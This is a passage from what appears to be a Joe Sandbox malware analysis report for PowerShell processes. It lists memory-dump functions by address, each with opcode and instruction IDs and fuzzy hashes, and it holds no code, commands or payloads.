                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 556a3b6ed75f14f2f7e731987b9dfb91e479afd4f2a27de0965e2af4c9b155d6
                                      • Instruction ID: f3b0eadd853e725d39b4d7f44b8bbdb56cbfb8e958cfb2a5bc9cbb875e5db651
                                      • Opcode Fuzzy Hash: 556a3b6ed75f14f2f7e731987b9dfb91e479afd4f2a27de0965e2af4c9b155d6
                                      • Instruction Fuzzy Hash: DCC12632A0FB890FEBA59B6848651A87BE1EF5A354F1901BEC05CC71E7DD29AD06C341
                                      Function 00007FFD9B828F84 Relevance: .4, Instructions: 354COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89c572484764c204190a770033cbef8bdfc046f73c0513cec6002160e4b0fa63
                                      • Instruction ID: 8894e38519d729f1bab7171da6b7e18ccea3131d115ae2ffab527ba7bba324c4
                                      • Opcode Fuzzy Hash: 89c572484764c204190a770033cbef8bdfc046f73c0513cec6002160e4b0fa63
                                      • Instruction Fuzzy Hash: 0EB12322F0EA8A0FE7A9AB6848691787BD1EF5A350F1905FED05CC71E7DD18AD05C381
                                      Function 00007FFD9B82A1F1 Relevance: .3, Instructions: 344COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d3d00987f5328e5b7da21508696b2adaa48ca5dc40dc3b777df86c480ffa98d
                                      • Instruction ID: a7a226c8947952a9f42158617594f37b7ef0a4462229aebe8373849a28d25bc7
                                      • Opcode Fuzzy Hash: 7d3d00987f5328e5b7da21508696b2adaa48ca5dc40dc3b777df86c480ffa98d
                                      • Instruction Fuzzy Hash: 93B14522F0FA8E2FE7A5976848651787AD1EF5A350F0901BED44DC70E7ED29AD058342
                                      Function 00007FFD9B825E09 Relevance: .3, Instructions: 318COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acbe2e3d9b8cf909ffdb5f6985312e5f418f830418c6b8ba477eca0a3eef4ca2
                                      • Instruction ID: 14cb3a79c5a5800b4cee971b1288fb3bbb06ebe24e7054278c025af865a0b090
                                      • Opcode Fuzzy Hash: acbe2e3d9b8cf909ffdb5f6985312e5f418f830418c6b8ba477eca0a3eef4ca2
                                      • Instruction Fuzzy Hash: 54A11362A4FBC90FE7A6976848341A57FE1AF4B250B0A01FFD498CB1F3C9196D09C342
                                      Function 00007FFD9B825E01 Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a938acc912ae5f24db3d02c3f3d24d9f435cb1f21b9c3303b539d7cb77022a73
                                      • Instruction ID: 5ea0398ede0233deb66e8546380325cf9d8e6e761bcd4244b9bbf025ea0ae58c
                                      • Opcode Fuzzy Hash: a938acc912ae5f24db3d02c3f3d24d9f435cb1f21b9c3303b539d7cb77022a73
                                      • Instruction Fuzzy Hash: A0812672B0FB8A0FE7A99B6844701B876D2EF99250B1901FEC05DC71E7DE28AD058341
                                      Function 00007FFD9B823282 Relevance: .2, Instructions: 228COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acc26204a20d43702bd88070cbc1a22a6d7a19041058ff92e0334f4c4f1dae22
                                      • Instruction ID: 792544584bd55f4d41eae10a60c74f813a49d8aa5f9be1fa725a7498cbe21e8e
                                      • Opcode Fuzzy Hash: acc26204a20d43702bd88070cbc1a22a6d7a19041058ff92e0334f4c4f1dae22
                                      • Instruction Fuzzy Hash: DA710321A0E7C94FD763977858745A57FE0EF5B264B0A01FBD088CB0F3DA59AA09C342
                                      Function 00007FFD9B82B08A Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dea5612a49ca625fe4549e1f35497ba3de649105f30f911f3962d0ee3fc701a
                                      • Instruction ID: 777d391ec691741eb139c84dd64138324e9bfa72f2560630967e6a0e2ef3ad0e
                                      • Opcode Fuzzy Hash: 7dea5612a49ca625fe4549e1f35497ba3de649105f30f911f3962d0ee3fc701a
                                      • Instruction Fuzzy Hash: 42513472F1FA4A4FE7659B2C98A56E873E0EF58350F1401FAD45CC32D6DE246D428781
                                      Function 00007FFD9B822ED7 Relevance: .2, Instructions: 204COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23adcd9e364138dfd7a0fef179e674c27ebfb3506521c791f71fefa70ee4b4b3
                                      • Instruction ID: 7c5c90c881d497d56be702bb5633713a14c30a0bcf3960d222e269f18870a578
                                      • Opcode Fuzzy Hash: 23adcd9e364138dfd7a0fef179e674c27ebfb3506521c791f71fefa70ee4b4b3
                                      • Instruction Fuzzy Hash: 12614773F0E6890FE764EB9888616A8B7D0EF59350F0502FED45CC71E7DD2469458781
                                      Function 00007FFD9B827C06 Relevance: .2, Instructions: 175COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e6253cd7f465d41bb0782a9528fb611e38db00f1787a44d0f2e89443ca0ecdb
                                      • Instruction ID: 909e7983582bbcf508d249bceb6115a641daf7fa2b84000999044634013879c1
                                      • Opcode Fuzzy Hash: 6e6253cd7f465d41bb0782a9528fb611e38db00f1787a44d0f2e89443ca0ecdb
                                      • Instruction Fuzzy Hash: 02512836B0EB890FE7A5EB6888616B8B7D1EF59310F0801BED45CC72D7DE286D458741
                                      Function 00007FFD9B828C7A Relevance: .2, Instructions: 174COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565f95fb4f97c8f150baf862d2cdbcfbae14a745862a16c6cc387c530fa53771
                                      • Instruction ID: 77e13c68f2893d04101b557a791ef4557ebcbf37b4493ebe70e43dbbd2a861b1
                                      • Opcode Fuzzy Hash: 565f95fb4f97c8f150baf862d2cdbcfbae14a745862a16c6cc387c530fa53771
                                      • Instruction Fuzzy Hash: E3512A32B0F7890FEBA5EB5888656A8B7E1EF69350F0801BED45C871E7CE246D458741
                                      Function 00007FFD9B82605A Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a19bbae68b8f931f030d83ad5e1f8ca21b5b19830d463ee18d4a6a084db2d400
                                      • Instruction ID: 904c7d71079efd6bd7a9420de649e1df623bf488d434026c55c16c1b5da9093d
                                      • Opcode Fuzzy Hash: a19bbae68b8f931f030d83ad5e1f8ca21b5b19830d463ee18d4a6a084db2d400
                                      • Instruction Fuzzy Hash: 79513872F0E7894FE7A9EB5888615A8B7D1EF69350F1801FED05CC71E3CE2869458741
                                      Function 00007FFD9B82381A Relevance: .2, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03dc7234329756a6c7dfd167ce1f3442e8e40e3fac00ece023e9f8fc03eeb88b
                                      • Instruction ID: 0f00297d4994f00a91b7a43f7e723ffe09e3c43fe9e70b3014587d7125178f21
                                      • Opcode Fuzzy Hash: 03dc7234329756a6c7dfd167ce1f3442e8e40e3fac00ece023e9f8fc03eeb88b
                                      • Instruction Fuzzy Hash: 6F512B72B0EB894FE765EB5888B25A8B7D1FF5A360F0901BDD05C871E3CE2469458741
                                      Function 00007FFD9B8292A2 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81da6925c945dd39d53cabda144de35140ebe39d16adc1f44ed873debd7d02fa
                                      • Instruction ID: a279c6a3515304fe184878b9e05bfa408e84f7cfcefa9814bc34f033a564a4e2
                                      • Opcode Fuzzy Hash: 81da6925c945dd39d53cabda144de35140ebe39d16adc1f44ed873debd7d02fa
                                      • Instruction Fuzzy Hash: 72414963B0EA860BF764D7AC586A6A8B7D1EF99250F1806FED09CC71E7DD147901C381
                                      Function 00007FFD9B82A4FF Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793b4a4f2b73f15d6122cb1764bfc16cdebd35e46c4bd19ab89d0a88e736a26e
                                      • Instruction ID: 6876718420508b064b981bd6cd74a767e82b45b3b233ca12f3b9a524dc865508
                                      • Opcode Fuzzy Hash: 793b4a4f2b73f15d6122cb1764bfc16cdebd35e46c4bd19ab89d0a88e736a26e
                                      • Instruction Fuzzy Hash: 42414923B0FA8A1FF765D7A848656A977D1EF59310F1802FED05C871E7DE286C058781
                                      Function 00007FFD9B82B5AA Relevance: .1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d389e020fa6438ddd3704e7a008520ca076ec4119a16af4d97d44bf2606b28f
                                      • Instruction ID: 39d1013bf7685f945dcc050a55269f08af49ce18cd56a962664942256f7c452f
                                      • Opcode Fuzzy Hash: 9d389e020fa6438ddd3704e7a008520ca076ec4119a16af4d97d44bf2606b28f
                                      • Instruction Fuzzy Hash: 14311362B0FAC90FE7A69BAC58715B87BD1EF5A290B0905FFD049C71E7D909AC498301
                                      Function 00007FFD9B757FCE Relevance: .1, Instructions: 101COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76c4446031641f25b0fe2d6d0e31f59eeeba82e3184c657397d7279ae1cd8d15
                                      • Instruction ID: 62ecf17934c964ce4027e0fe8209834f0a951a8087e7747e25afa1e67e4951d9
                                      • Opcode Fuzzy Hash: 76c4446031641f25b0fe2d6d0e31f59eeeba82e3184c657397d7279ae1cd8d15
                                      • Instruction Fuzzy Hash: 8F310A31A18A4D8FDF98EF58C495EAD77E1FF68300F140169E40DD7295CA75E882CB81
                                      Function 00007FFD9B82A9F0 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4cd45ee86152b90c8511a7cfda19a4fabe828e31b943515bbef7fe8a4bee7d76
                                      • Instruction ID: b74a55a2ee878a2d5c541aaac3d40939ca24082c20b8a4834fa16eeca55b7a1a
                                      • Opcode Fuzzy Hash: 4cd45ee86152b90c8511a7cfda19a4fabe828e31b943515bbef7fe8a4bee7d76
                                      • Instruction Fuzzy Hash: 5C214C72A1EBCC5FEB65DF6898514A87BD0EF1975070400BFD48A871A3E934BC448782
                                      Function 00007FFD9B82B1EE Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ad70a11a70ac12ec00a523ce4e8db15a7beb304ed4100b9d5afb5b68e4d3d08
                                      • Instruction ID: 2a7537d49e9b3f750fafe8a59b80b44337e2a49ffa1714f25f3092d0813396e9
                                      • Opcode Fuzzy Hash: 3ad70a11a70ac12ec00a523ce4e8db15a7beb304ed4100b9d5afb5b68e4d3d08
                                      • Instruction Fuzzy Hash: 2221B372B1F7894FE765E75898665E8B7E0EF59320F0402FAD05D831E2DA2429418B41
                                      Function 00007FFD9B82497D Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ea4f0380f388e8bdde182b56c9c2e6791a04bf3e6569656db2feea9176c659a
                                      • Instruction ID: 2cf2550c65c2b8706ef9cb7e6b3e92cf05c4e18aed2434f3bbb9c107cf0038b1
                                      • Opcode Fuzzy Hash: 1ea4f0380f388e8bdde182b56c9c2e6791a04bf3e6569656db2feea9176c659a
                                      • Instruction Fuzzy Hash: 1C11F323B0E6890FEB65E76848A25ECB7A1FF55210F0802BEE09D861E7DE1829408751
                                      Function 00007FFD9B829682 Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea0c982dc9892a1bb015e1cc73d517beb3388591e6cb379fcd92c93ef72f51ae
                                      • Instruction ID: e68f689069cd099bb65b5f805a161ec4b7ad16cdb63ee6356a70474ab99b336c
                                      • Opcode Fuzzy Hash: ea0c982dc9892a1bb015e1cc73d517beb3388591e6cb379fcd92c93ef72f51ae
                                      • Instruction Fuzzy Hash: 0211E362A0FACD0FEBA6E768486C8657BD1DF1625074909FED489CB1E3E809AD44C381
                                      Function 00007FFD9B827FC2 Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4450de449699a7b75d226daec69a0759b0b0c271d9067fcb78812f72706e8d8
                                      • Instruction ID: 7f7dcebdb610aee5521526e21e0f31d83a6fe729644c4cccbad37c35c32f168a
                                      • Opcode Fuzzy Hash: f4450de449699a7b75d226daec69a0759b0b0c271d9067fcb78812f72706e8d8
                                      • Instruction Fuzzy Hash: 1D110622B0FBCD0FEBA6E76808658657BD1DF1629074905FED449CB1E7DC19AD448381
                                      Function 00007FFD9B823BD2 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05c5bc230971960d0c5729e84d7313abd9a9de10c7bffc3086bab9324da986b7
                                      • Instruction ID: 6cf216767e1ff4544cd6acda55408a24e9e837f86ed78ec9f08cdbf148aefc49
                                      • Opcode Fuzzy Hash: 05c5bc230971960d0c5729e84d7313abd9a9de10c7bffc3086bab9324da986b7
                                      • Instruction Fuzzy Hash: 3E110A61B0FACD0FD7A6E76808759657FD1DF1526070905FED48DCB2E3D819AD448381
                                      Function 00007FFD9B82131E Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17509b1e844a639475834504e146224958a8369eb0c0a010c46e4f75b65d790f
                                      • Instruction ID: d186ae73387cc8bd4c5689a590f53ef76bf84e66c518b13e3813ccdef383ce7b
                                      • Opcode Fuzzy Hash: 17509b1e844a639475834504e146224958a8369eb0c0a010c46e4f75b65d790f
                                      • Instruction Fuzzy Hash: 9001C422F1FA5E0FEBA5B7AC14395B861C2EF58250B6900FAE40DC75E7DD1CAD014340
                                      Function 00007FFD9B753BC5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: fbb99fe331381098bda212ca1bbba3abb05b09ac2881a28005e605d1933a0678
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: 6B01A73020CB0C4FDB88EF0CE051AA5B3E0FB85320F10056DE58AC36A1D632E882CB41
                                      Function 00007FFD9B8215F8 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a63ad7a02fd3d6f0166e749adf68e81d1d8b7252df968c9301200e47b62e9caf
                                      • Instruction ID: 35b5cf4551274193ccd2e42ba6b049546be596b86a157010d6d2397c52e6029b
                                      • Opcode Fuzzy Hash: a63ad7a02fd3d6f0166e749adf68e81d1d8b7252df968c9301200e47b62e9caf
                                      • Instruction Fuzzy Hash: 2FF0FC21B1E50A4FEB78A748D5A54FC62C2EFC8250B6940FAD40DC2197DE16A8018240

                                      Executed Functions

                                      Function 00007FFD9B7F1A36 Relevance: .9, Instructions: 905COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8c18378133ac3836ea23eb2e30b5e4f5623d562c806c6d97e372b20a67b0f8c
                                      • Instruction ID: 47d56e5789d7ec23ed51d9c121a752e719ce89623799d5e4a8175d2aa7995fba
                                      • Opcode Fuzzy Hash: c8c18378133ac3836ea23eb2e30b5e4f5623d562c806c6d97e372b20a67b0f8c
                                      • Instruction Fuzzy Hash: 4F520832B0EB8D4FE7669B6848646B47FE1EF56210F4A02FAD489C71F3D918AD05C385
                                      Function 00007FFD9B7241FA Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 9Q_H
                                      • API String ID: 0-2218632329
                                      • Opcode ID: 0b3e609d2ac934e046032d8159f3f404f1df33507500d9ad0d968f8a6fdc13b5
                                      • Instruction ID: e23120a6c40bac2178340e136cd6f556f9cb95211de228161d7d204ee1c02d63
                                      • Opcode Fuzzy Hash: 0b3e609d2ac934e046032d8159f3f404f1df33507500d9ad0d968f8a6fdc13b5
                                      • Instruction Fuzzy Hash: 4DE1453171DB4A4FEB98EB1CC4A5AF577E1FF95310B1502BED08AC72A7DA25E8428740
                                      Function 00007FFD9B7F0BEB Relevance: .8, Instructions: 757COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3dbffbe90e8c82c271adfaf9a3da750231302bcbd79ed379013129a35f1ee9a
                                      • Instruction ID: d6ac33edc7d76028f8e7e1052b8f56d6d20a1254c921833906fea256d35a0c02
                                      • Opcode Fuzzy Hash: f3dbffbe90e8c82c271adfaf9a3da750231302bcbd79ed379013129a35f1ee9a
                                      • Instruction Fuzzy Hash: 4C321272B0EBC94FE7A6DB6848655A47FE1EF56210F0902FAD089C72F3D919AD05C381
                                      Function 00007FFD9B7F278D Relevance: .5, Instructions: 513COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce9b0ffdd67d64e06d3358a85e64ff4a6f768d04a3cce47da8527b1cc2aa305b
                                      • Instruction ID: 332f86615f4f5f254e60d5a64df103d2abb1997ac1cfc31161efce23924f8f93
                                      • Opcode Fuzzy Hash: ce9b0ffdd67d64e06d3358a85e64ff4a6f768d04a3cce47da8527b1cc2aa305b
                                      • Instruction Fuzzy Hash: B5E10922B0E7CD4FE7669BA848651B47FE1EF56210B4902FFE489C71B3D918A906C385
                                      Function 00007FFD9B72C780 Relevance: .1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23501173ce7ff473ee98d1ceaeaa0cc0d4309b5e5946c7ae7222ba8d01cf43b7
                                      • Instruction ID: 2768a806f3b839a0a0b7384ee95e2159d58d70cb1ae533cbb8fb1955142d1d89
                                      • Opcode Fuzzy Hash: 23501173ce7ff473ee98d1ceaeaa0cc0d4309b5e5946c7ae7222ba8d01cf43b7
                                      • Instruction Fuzzy Hash: 2431A670E0934D8FE769CB6480656B8BBF1EF65350F1502BAD009DA2F3CA395A84CB11
                                      Function 00007FFD9B7F290E Relevance: .1, Instructions: 80COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8fb15aafc1a8e6d9488704e973fe57c8d57edffe26e6557a6e25cfa8b64add4a
                                      • Instruction ID: a883053e2f6187942e0ce2b501efec2f90943e0560e5f0ab87cd20722ce4d85e
                                      • Opcode Fuzzy Hash: 8fb15aafc1a8e6d9488704e973fe57c8d57edffe26e6557a6e25cfa8b64add4a
                                      • Instruction Fuzzy Hash: 5511E431B1DB0D0FEBACDA5C54611797BD2EF99221B8801BFE44EC71B7DD1599024344
                                      Function 00007FFD9B7F1BEB Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 241d00468b2cd1dc3d97e33256dfbcadda3a3d4831bf89c02759de219a22d16e
                                      • Instruction ID: 6c3f7aa613cf9e669fe44944997fb8aa1582852825f0e53621389f9a49c77017
                                      • Opcode Fuzzy Hash: 241d00468b2cd1dc3d97e33256dfbcadda3a3d4831bf89c02759de219a22d16e
